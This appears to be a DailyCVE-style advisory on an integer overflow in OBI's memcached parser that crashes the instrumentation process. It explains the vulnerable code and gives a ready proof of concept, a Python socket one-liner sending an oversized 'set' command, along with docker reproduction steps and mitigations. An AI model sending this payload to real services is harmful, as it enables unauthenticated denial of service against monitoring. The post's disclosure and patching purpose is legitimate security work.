OBI memcached parser, Integer Overflow, (no CVE) (critical)

Listen to this Post

How the mentioned CVE works (approx. 20 lines):

The vulnerability exists in OBI’s memcached text protocol parser. When handling storage commands (set, add, replace, append, prepend, cas), the function `memcachedCommandBytesField` parses the `` field using `strconv.Atoi` and only rejects negative values. No upper bound check is performed, so values up to `math.MaxInt` (9,223,372,036,854,775,807 on 64‑bit) are accepted. Later, `memcachedConsumeStoragePayload` computes the total payload length by adding the delimiter `\r\n` length: payloadLen := bytesField + len(memcachedDelimBytes). If `bytesField` is `math.MaxInt` or math.MaxInt-1, this addition overflows the signed integer and yields a negative payloadLen. This negative length is passed to `LargeBufferReader.Peek` in large_buffer.go. The `Peek` method checks `n > Remaining()` but does not reject negative `n` before performing a slice operation: r.lb.chunks[r.rchunk][r.roff : r.roff+n]. With a negative n, the slice upper bound becomes negative, triggering a Go runtime panic. Since OBI runs as a privileged instrumentation process, an attacker who can send a crafted memcached storage command to an instrumented service can crash OBI remotely, causing denial of service. Affected lines: memcached_detect_transform.go:322, :386, and large_buffer.go:501.

dailycve form (3 words max per line):

Platform: OBI memcached parser
Version: vulnerable commit unknown
Vulnerability: integer overflow panic
Severity: critical
Date: not disclosed

Prediction: next release (two weeks)

What Undercode Say:

Analytics – bash commands to reproduce and check crash:

Start memcached test environment
docker compose -f internal/test/oats/memcached/docker-compose-include-base.yml \
-f internal/test/oats/memcached/docker-compose-obi-python-memcached.yml \
up --build
Verify service is running
curl http://127.0.0.1:8080/memcached
Send crafted overflow command (64-bit)
docker compose -f internal/test/oats/memcached/docker-compose-include-base.yml \
-f internal/test/oats/memcached/docker-compose-obi-python-memcached.yml \
exec testserver \
python -c 'import socket; s=socket.create_connection(("memcached",11211), timeout=5); s.sendall(b"set crash 0 0 9223372036854775807\r\nvalue\r\n"); s.close()'
Confirm panic in OBI logs
docker compose -f internal/test/oats/memcached/docker-compose-include-base.yml \
-f internal/test/oats/memcached/docker-compose-obi-python-memcached.yml \
logs autoinstrumenter | grep -i panic

Exploit:

Send a memcached `set` command with `` = `math.MaxInt` (or math.MaxInt-1) followed by \r\nvalue\r\n. No authentication needed. Triggers integer overflow → negative slice bound → OBI panic and crash.

Protection from this CVE:

Apply upstream patch once released (adds upper bound check on `` field). Until then, deploy input validation rules on memcached traffic (e.g., reject `bytes` > reasonable limit, e.g., 1GB). Alternatively, isolate OBI from untrusted memcached traffic or restart OBI automatically after crashes.

Impact:

Remote denial of service. Attacker crashes OBI, losing all telemetry collection until manual or automated restart. No code execution or authentication required. Affects deployments where OBI monitors memcached text protocol from attacker‑reachable services.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top